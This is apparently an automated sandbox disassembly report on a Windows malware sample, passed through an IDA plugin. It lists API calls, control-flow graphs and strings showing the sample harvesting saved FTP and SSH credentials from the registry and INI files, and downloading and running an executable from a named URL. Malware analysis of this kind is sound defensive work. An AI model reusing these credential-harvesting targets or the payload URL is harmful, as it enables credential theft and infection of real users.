                                                • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                                                • API String ID: 1332880857-44262141
                                                • Opcode ID: 099759bd5eebce2636a932983d9bc0acd7fcf7c9cfe220f21ca98c520a565fdf
                                                • Instruction ID: 347561e4b523bc0a5dc93672fbbdc60ad6bb77937e40ac96be74a297ebc96aca
                                                • Opcode Fuzzy Hash: 099759bd5eebce2636a932983d9bc0acd7fcf7c9cfe220f21ca98c520a565fdf
                                                • Instruction Fuzzy Hash: F7213B31A80A08FADB116A50CC42FDE7B77AB84B44F608567B508740E9DABD5B90AF4C
                                                APIs
                                                • VirtualProtect.KERNEL32(00000000,-00000001,?,00000040), ref: 006100AE
                                                • VirtualProtect.KERNEL32(00000000,?,00000040,00000040), ref: 00610130
                                                • VirtualProtect.KERNEL32(00000000,-00000001,?,00000040), ref: 00610322
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.1684799843.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_610000_8WgZHDQckx.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID: $ $"$*$7$9wt$@$@$@$A$J$J$Y$d$e$zL
                                                • API String ID: 544645111-258783855
                                                • Opcode ID: 9cf56057281cad9d8c28858fbea2c87c5b91fceb659916d5e6e53869f4cde232
                                                • Instruction ID: 674e2bae13faf273775d0fa001efd5d4fcf07acf1e16ea5f96ab0976471f6769
                                                • Opcode Fuzzy Hash: 9cf56057281cad9d8c28858fbea2c87c5b91fceb659916d5e6e53869f4cde232
                                                • Instruction Fuzzy Hash: 75C12570D05288DBEF15CFE8C588BDDBBB2AF58304F288199D8493B385C3B95A85CB55

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00401F6D
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401FAD
                                                • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402060
                                                • lstrlenA.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402099
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004020D0
                                                • GetHGlobalFromStream.OLE32(?,?,?,?), ref: 004020FC
                                                • GlobalLock.KERNEL32(?), ref: 0040212C
                                                • GlobalUnlock.KERNEL32(?), ref: 0040214B
                                                • GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 0040215D
                                                • GlobalLock.KERNEL32(?), ref: 0040218D
                                                • GlobalUnlock.KERNEL32(?), ref: 004021AC
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
                                                • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                • API String ID: 4234118056-981893429
                                                • Opcode ID: c8d435d750b01384af47649e40dca5ee0034dfe4a2571e3c88f5325bd11c9826
                                                • Instruction ID: 160f39242e293253884e826bec42dd5f31ffd203cc24020af9fb355c0f5bab47
                                                • Opcode Fuzzy Hash: c8d435d750b01384af47649e40dca5ee0034dfe4a2571e3c88f5325bd11c9826
                                                • Instruction Fuzzy Hash: 92613E75D001A8BADB31AB21CD42BEA7679AB44344F0040F7B688B11F1D7BD5FC4AE68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 170 40fbec-40fbf4 171 40fdc5-40fdc8 170->171 172 40fbfa-40fc02 call 403bae 170->172 174 40fc07-40fc09 172->174 175 40fdb3-40fdbf 174->175 176 40fc0f-40fc16 174->176 175->171 175->172 176->175 177 40fc1c-40fc36 call 401770 176->177 180 40fc6f-40fc72 177->180 181 40fc74-40fc9f call 4012a9 call 401129 180->181 182 40fc38-40fc6e wsprintfA call 401c93 180->182 189 40fca5-40fcaf 181->189 190 40fd9d-40fdae call 4018a0 call 40101f 181->190 182->180 189->190 192 40fcb5-40fcc8 GetTempPathA 189->192 190->175 192->190 193 40fcce-40fcd3 192->193 193->190 195 40fcd9-40fd0f GetTickCount wsprintfA CreateDirectoryA call 4023f0 193->195 199 40fd31-40fd3f call 401c3f 195->199 200 40fd11-40fd2f call 401c3f call 401c93 195->200 204 40fd44-40fd5d call 40144b 199->204 200->204 209 40fd92-40fd98 call 4018a0 204->209 210 40fd5f-40fd8d lstrlenA call 402524 ShellExecuteA 204->210 209->190 210->209
                                                APIs
                                                  • Part of subcall function 00401770: GetHGlobalFromStream.OLE32(?,?), ref: 0040177D
                                                  • Part of subcall function 00401770: GlobalLock.KERNEL32(?), ref: 00401794
                                                  • Part of subcall function 00401770: GlobalUnlock.KERNEL32(?), ref: 004017AC
                                                • wsprintfA.USER32 ref: 0040FC4E
                                                • GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002), ref: 0040FCC1
                                                • GetTickCount.KERNEL32 ref: 0040FCD9
                                                • wsprintfA.USER32 ref: 0040FCEB
                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FCFC
                                                • lstrlenA.KERNEL32(true,?,00000000), ref: 0040FD64
                                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040FD8D
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                                  • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                                  • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Globallstrlen$wsprintf$CountCreateDirectoryExecuteFromLockPathShellStreamTempTickUnlocklstrcatlstrcpy
                                                • String ID: %02X$%d.exe$MZ$http://dynamotouren.de/4XM2f.exe$open$true
                                                • API String ID: 3844566713-3815468056
                                                • Opcode ID: d7cd4a0a4bc6714c2a85d86dd2bf7c06aba812de7b2a8469bb75f735029e579c
                                                • Instruction ID: df3052cfafe379999bc740e25712be6a23053747995945cc34dd6b940c50c795
                                                • Opcode Fuzzy Hash: d7cd4a0a4bc6714c2a85d86dd2bf7c06aba812de7b2a8469bb75f735029e579c
                                                • Instruction Fuzzy Hash: A6414B71900228AADB30ABA18C46FEEB7B9AF05305F1045F7B548B15E1D6BC8EC49F59

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 370 402a46-402a55 371 402a57 370->371 372 402a58-402a60 370->372 373 402a62-402a69 372->373 374 402a74-402a78 372->374 373->374 375 402a6b-402a72 373->375 375->374 376 402a79-402a8f GetCurrentProcess OpenProcessToken 375->376 377 402b25-402b29 376->377 378 402a95-402ab1 GetTokenInformation 376->378 379 402ab3-402abb GetLastError 378->379 380 402b1d-402b20 CloseHandle 378->380 379->380 381 402abd-402ac1 379->381 380->377 381->380 382 402ac3-402ae5 call 4018b7 GetTokenInformation 381->382 385 402b15-402b18 call 4018a0 382->385 386 402ae7-402af9 ConvertSidToStringSidA 382->386 385->380 386->385 388 402afb-402b0a lstrcmpA 386->388 389 402b0c 388->389 390 402b0d-402b10 LocalFree 388->390 389->390 390->385
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: S-1-5-18
                                                • API String ID: 0-4289277601
                                                • Opcode ID: 37bc9dbcb38b01fa5aecd9c86e21be2900b90d044a773d9fa0b61d3e1d082508
                                                • Instruction ID: 8372d51fa9723f903650ede8cb06a39b1e2f15f0f1e7b236b3afffd489f3b0a9
                                                • Opcode Fuzzy Hash: 37bc9dbcb38b01fa5aecd9c86e21be2900b90d044a773d9fa0b61d3e1d082508
                                                • Instruction Fuzzy Hash: 8F214F35A00109AFDF21AFA0DD8ABEE7B75FB40304F504577A010F11E5DBB99A80CB18

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 391 4064d0-4064ed RegOpenKeyA 392 406752-406753 391->392 393 4064f3 391->393 394 4064fa-406521 RegEnumKeyExA 393->394 395 406523-40674d RegCloseKey 394->395 396 406528-4065e6 call 401c3f call 401c93 call 401bb8 * 5 394->396 395->392 412 4065e8-4065ef 396->412 413 4065fb 396->413 412->413 414 4065f1-4065f9 412->414 415 406605-40662a call 4018a0 call 401bb8 413->415 414->415 420 40662c-406633 415->420 421 40663f 415->421 420->421 422 406635-40663d 420->422 423 406649-406656 call 4018a0 421->423 422->423 426 406697-40669e 423->426 427 406658-40665f 423->427 428 4066a0-4066a7 426->428 429 40670b-406745 call 4018a0 * 5 426->429 427->426 430 406661-406677 call 40421d 427->430 428->429 432 4066a9-4066b0 428->432 429->394 437 406682-40668d call 4018a0 430->437 438 406679-406680 430->438 432->429 436 4066b2-406706 call 401551 call 4015b3 * 2 call 401587 call 401551 call 4015b3 432->436 436->429 437->426 438->426 438->437
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 004064E6
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040651A
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040674D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                                                • API String ID: 1332880857-4069465341
                                                • Opcode ID: c6b7513951c47f9f5a01cf0da4954a9267f7612b84efb48c3a5f0a91923dc72f
                                                • Instruction ID: 0fc096d3d37037cc16ed1ec1010328a36586c2584db581cee8302a5e1ef279a3
                                                • Opcode Fuzzy Hash: c6b7513951c47f9f5a01cf0da4954a9267f7612b84efb48c3a5f0a91923dc72f
                                                • Instruction Fuzzy Hash: 3251E47181011CEADF216B61CD41BED7AB9BF44308F10C0BAB589741B1CB7A5BA1DF98

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 460 40ce9d-40ceb7 RegOpenKeyA 461 40d0f2-40d0f3 460->461 462 40cebd 460->462 463 40cec4-40ceeb RegEnumKeyExA 462->463 464 40cef2-40cf89 call 401c3f * 2 call 4018a0 call 401bb8 * 4 463->464 465 40ceed-40d0ed RegCloseKey 463->465 481 40cfa4-40cfa6 464->481 482 40cf8b-40cf92 464->482 465->461 484 40cfa8-40cfa9 call 4018a0 481->484 485 40cfae 481->485 482->481 483 40cf94-40cfa2 call 4018a0 482->483 488 40cfb8-40cff5 call 401bb8 * 2 483->488 484->485 485->488 494 40cffb-40d011 call 40421d 488->494 495 40d08f-40d0e5 call 4018a0 * 5 call 40ce9d call 4018a0 488->495 494->495 500 40d013-40d017 494->500 495->463 500->495 502 40d019-40d020 500->502 502->495 504 40d022-40d029 502->504 504->495 506 40d02b-40d08a call 401551 call 4015b3 * 2 call 401587 call 401551 call 4015b3 * 2 504->506 506->495
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040CEB0
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040CEE4
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D0ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                                                • API String ID: 1332880857-2649023343
                                                • Opcode ID: 7728b8fa2dad9df23dcf8aacb147bd42159a0573e5b603dfd2a373a2b42fffd3
                                                • Instruction ID: ad14e17c657b7347be5ca3fad85bf2b98e7f27bb44b17b38ae0359069b7c340a
                                                • Opcode Fuzzy Hash: 7728b8fa2dad9df23dcf8aacb147bd42159a0573e5b603dfd2a373a2b42fffd3
                                                • Instruction Fuzzy Hash: D351D63190011CFADF216B61CC42BDDBABABF04304F54C1BAB548740B1DB7A9B91AF99

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 529 4079f4-407a0e RegOpenKeyA 530 407a14 529->530 531 407c56-407c57 529->531 532 407a1b-407a42 RegEnumKeyExA 530->532 533 407a44-407c51 RegCloseKey 532->533 534 407a49-407afc call 401c3f * 2 call 4018a0 call 401bb8 * 5 532->534 533->531 552 407b17-407b19 534->552 553 407afe-407b05 534->553 555 407b21 552->555 556 407b1b-407b1c call 4018a0 552->556 553->552 554 407b07-407b15 call 4018a0 553->554 557 407b2b-407b52 call 401bb8 554->557 555->557 556->555 563 407bf3-407c49 call 4018a0 * 5 call 4079f4 call 4018a0 557->563 564 407b58-407b5f 557->564 563->532 564->563 565 407b65-407b6c 564->565 565->563 567 407b72-407bcc call 401551 call 4015b3 * 3 call 401551 call 4015b3 565->567 593 407be9-407bee call 401551 567->593 594 407bce-407bd5 567->594 593->563 594->593 595 407bd7-407be7 call 401551 594->595 595->563
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407A07
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407A3B
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                                • API String ID: 1332880857-3874328862
                                                • Opcode ID: 8266ec6394c74800c545c16a1eb243b31db84d6e9d57949c5817b2753a8ca0d6
                                                • Instruction ID: a2f01c333091a56cc32e69063268797347cd9da882b10acedfa14ebce3a0f252
                                                • Opcode Fuzzy Hash: 8266ec6394c74800c545c16a1eb243b31db84d6e9d57949c5817b2753a8ca0d6
                                                • Instruction Fuzzy Hash: 5F51D33190011CBADF216F51CC42BDD7AB9BF44308F50C1BAB548751B1DB7AAB91AF89

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DAA0
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DAD4
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DCBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                                                • API String ID: 1332880857-3620412361
                                                • Opcode ID: 3c78c24fb642e282fd578471d96bd84f9d03d9c7dc1ebaff2a0e33f91934ec65
                                                • Instruction ID: bf8ea6aea8852beb4c2163d16f4011c6439d7f5d6a7be0a0bc644d5b63a99ee0
                                                • Opcode Fuzzy Hash: 3c78c24fb642e282fd578471d96bd84f9d03d9c7dc1ebaff2a0e33f91934ec65
                                                • Instruction Fuzzy Hash: 9151A631900118FADF226F51CC42BDD7AB6BF04344F50C5BAB548741B1DBBA9BA59F88

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407D59
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407D8D
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                                                • API String ID: 1332880857-2128033141
                                                • Opcode ID: 986fd394e2a718d93715dc03a1c8b3f2a4ede69ef196c9cdd04049391403d32d
                                                • Instruction ID: a6929998d7c28aeb33d9c4f10452cd18dbdaa3222607fbefcc00903e29e47e26
                                                • Opcode Fuzzy Hash: 986fd394e2a718d93715dc03a1c8b3f2a4ede69ef196c9cdd04049391403d32d
                                                • Instruction Fuzzy Hash: 7151A33184011CBADF216F51CC42BED7ABABF04304F50C5BAB558741B1DB7A5BA1AF88

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 718 402524-402546 RegCreateKeyA 719 402548-40255f RegSetValueExA 718->719 720 40256a-40256c 718->720 721 402561 719->721 722 402562-402565 RegCloseKey 719->722 723 402572-402585 GetTempPathA 720->723 724 402637-40263b 720->724 721->722 722->720 723->724 725 40258b-402590 723->725 725->724 726 402596-4025b2 CreateDirectoryA call 4023f0 725->726 729 4025d0-4025da call 401c3f 726->729 730 4025b4-4025ce call 401c3f call 401c93 726->730 734 4025df-402603 CreateFileA 729->734 730->734 736 402605-402618 call 40140a CloseHandle 734->736 737 40261d-40261f 734->737 736->737 740 402621-402627 DeleteFileA 737->740 741 40262c-402632 call 4018a0 737->741 740->741 741->724
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 0040253F
                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00402558
                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 00402565
                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040257E
                                                • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 0040259F
                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004025FA
                                                • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402618
                                                • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402627
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
                                                • String ID: Software\WinRAR
                                                • API String ID: 3443402316-224198155
                                                • Opcode ID: 13873cc295b6137b813846326813ebbb91304b46cf2c86a41a1078ee5c261f3e
                                                • Instruction ID: 32f6b297682f596fcc5cacc293333f1b3d1948feb52381050e5e2f934166a6a3
                                                • Opcode Fuzzy Hash: 13873cc295b6137b813846326813ebbb91304b46cf2c86a41a1078ee5c261f3e
                                                • Instruction Fuzzy Hash: 0121817190020DBBDF21AFA1CD46FDE7A29AB14748F10047BB604B50E1D6FA9BD09B1C
                                                APIs
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E847
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E87B
                                                • GetPrivateProfileStringA.KERNEL32(Program,DataPath,00414918,?,00000104,00000000), ref: 0040E901
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E95A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                                                • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                                                • API String ID: 1343824468-2495907966
                                                • Opcode ID: f73ede30d54b750529b7b749db5b68bc80742756f9d8386b5fdb1dfc49aca1d6
                                                • Instruction ID: 6bcbfef0ff057cc4776b97580779cf95339c6a899dc07cd5d816c2af142598af
                                                • Opcode Fuzzy Hash: f73ede30d54b750529b7b749db5b68bc80742756f9d8386b5fdb1dfc49aca1d6
                                                • Instruction Fuzzy Hash: F031F87194020CBADF617B51CC42FDD7ABABF10704F10C4BBB548B50E1CAB95BA19B99

                                                Control-flow Graph

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00404EB0
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                                  • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                                  • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                                • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,00414918,?,00000104,?), ref: 00404F00
                                                • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,00414918,?,00000104,?), ref: 00404F3B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                                                • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                                                • API String ID: 2508676433-45949541
                                                • Opcode ID: 084568d19fe147f413b8ba655580a624bf3ad8219734f6705ee3260ffc2a1841
                                                • Instruction ID: e5b95db0642764f108e7ba041b0e550ef6841d1e24d09a2ff7db66db6e884bb2
                                                • Opcode Fuzzy Hash: 084568d19fe147f413b8ba655580a624bf3ad8219734f6705ee3260ffc2a1841
                                                • Instruction Fuzzy Hash: 7D2146B1A84208BAEF11BB61CC43FDD3669AB94744F1000B77708F51E2DAF99AC09A5D
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00406254
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406288
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406496
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Host$Port$PthR$SSH$User
                                                • API String ID: 1332880857-1643752846
                                                • Opcode ID: 8037f23a873e77a0f6edddb421db5ffbe9abf7f49fb2db230b895b2aee70f783
                                                • Instruction ID: 0e0d0a83c40d9c080529aadc08bc8f4cf689f85e177fa5954b2f3198303268ea
